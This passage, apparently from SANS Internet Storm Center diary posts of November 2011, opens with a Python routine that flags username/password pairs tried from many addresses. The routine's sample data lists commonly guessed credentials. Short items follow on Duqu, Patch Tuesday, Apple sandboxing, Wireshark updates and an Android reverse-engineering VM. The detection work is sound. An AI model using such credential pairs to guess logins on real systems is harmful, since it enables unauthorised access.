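    for src_ip, user, password in attempts:
        seen[(user, password)].add(src_ip)
    return seen

def widespread(attempts, min_sources=3):
    """Credential pairs tried from at least min_sources distinct addresses,
    most widespread first."""
    seen = sources_per_credential(attempts)
    hits = [(pair, len(ips)) for pair, ips in seen.items() if len(ips) >= min_sources]
    return sorted(hits, key=lambda item: item[1], reverse=True)

attempts = [
    ("192.0.2.10", "root", "ihatehackers"),
    ("198.51.100.7", "root", "ihatehackers"),
    ("203.0.113.99", "root", "ihatehackers"),
    ("192.0.2.10", "admin", "admin"),
    ("192.0.2.10", "root", "123456"),
]
print(widespread(attempts))  # [(('root', 'ihatehackers'), 3)]
```

A classic brute-force run shows up as many pairs from one source; the behavior described here shows up as one pair from many sources.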

So, how widespread is this behavior? Is anyone else seeing it? Also, does anyone have any idea what this attack is about? As I said, on the surface, this looks kinda lame, but perhaps someone out there knows something I don't...

Tom Liston

Senior Security Analyst - InGuardians, Inc.

SANS ISC Handler

Twitter: @tliston


Duqu Mitigation

There has been a lot of information published on Duqu over the past few days, and it is likely exploiting a vulnerability in a Microsoft Windows component, the Win32k TrueType font parsing engine. No patch has been released for this vulnerability yet; note, however, that it cannot be exploited automatically via email: the user has to open an attachment sent in an email message. The Microsoft advisory is posted at [1], US-CERT posted a critical alert [2], and Symantec published a whitepaper on the subject [3].

[1] http://technet.microsoft.com/en-us/security/advisory/2639658

[2] http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-291-01E.pdf

[3] http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


November 2011 Patch Tuesday Pre-release

This upcoming Tuesday, Microsoft is releasing four bulletins, ranging from critical to moderate, affecting all Windows versions. Detailed information can be found in the advance notification bulletin [1] and the MSRC blog post [2].

[1] http://technet.microsoft.com/en-us/security/bulletin/ms11-nov

[2] http://blogs.technet.com/b/msrc/archive/2011/11/03/advanced-notification-for-november-2011.aspx

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


An Apple, Inc. Sandbox to play in.

Today was a fairly slow *knock on wood* day on the Internet. It is rare that we have business as usual, so in my normal reading I came across an article [4] on how Apple, Inc. will require sandboxing [1] for all apps posted to the Mac App Store by March 1, 2012 [2]. There is a lot of chatter on the Internet about this move. In my opinion, there are some pros and cons to a move like this. One clear pro would be safer software (buyer beware: you have to trust Apple, Inc., of course). One perceived con is a lack of control over your operating system.

Sandboxing [5] [6], in short, is a method of creating a controlled container, if you will, in which an application runs. A few popular applications use this method, including Chrome [7]. The purpose of this controlled container is to limit the application's ability to make persistent changes to the operating system. Another common sandbox technique we often use is chroot [8].

As part of last month's Cyber Security Month, we covered the Critical Controls. Could this move contribute to a better implementation of Critical Control 7 [3]?

How do our readers feel about this, especially the Apple users among us?

[1] https://developer.apple.com/devcenter/mac/app-sandbox/ (Warning Dev Account Required)

[2] http://developer.apple.com/news/index.php?id=11022011a

[3] http://www.sans.org/critical-security-controls/control.php?id=7

[4] http://apple.slashdot.org/story/11/11/03/1532203/apple-to-require-sandboxing-for-mac-app-store-apps (Source Article)

[5] http://en.wikipedia.org/wiki/Sandbox_(computer_security)

[6] http://www.usenix.org/publications/library/proceedings/sec96/full_papers/goldberg/goldberg.pdf

[7] http://dev.chromium.org/developers/design-documents/sandbox

[8] http://www.freebsd.org/cgi/man.cgi?query=chroot&sektion=2

Richard Porter

--- ISC Handler on Duty

email: richard at isc dot sans dot edu

twitter: packetalien


Wireshark updates: 1.6.3 and 1.4.10 released

Wireshark has released 1.6.3 (stable) and 1.4.10 (old stable) to address vulnerabilities and bug fixes.


Secure languages & frameworks

Richard S wrote us and asked what information we could offer regarding languages and frameworks that are more suitable for developing secure applications, along with what attributes differentiate them from their less secure counterparts. Some criteria that could be used to compare them:

- Number of organizations that use each framework or language for 'secure' applications

- Availability & number of security elements built in to the core language / framework

- Availability & number of 3rd party security elements built (can they be identified as trustworthy)

- Number of vulnerabilities identified (per month, per year)

- Time to fix

So bring it on: tell us via the comment form what works for you and why (don't hesitate to include favorite static/runtime analysis tools).


Honeynet Project: Android Reverse Engineering (A.R.E.) Virtual Machine released

Christian (@cseifert) of the Honeynet Project advised us that they've released A.R.E, the Android Reverse Engineering Virtual Machine.

This VirtualBox-ready VM includes the latest Android malware analysis tools as follows:

- Androguard

- Android SDK/NDK

- APKInspector

- Apktool

- Axmlprinter

- Ded

- Dex2jar

- DroidBox

- Jad

- Smali/Baksmali

A.R.E. is freely available from http://redmine.honeynet.org/projects/are/wiki

Given the probable exponential growth in mobile malware, A.R.E. presents an opportunity to test, learn, and analyze.
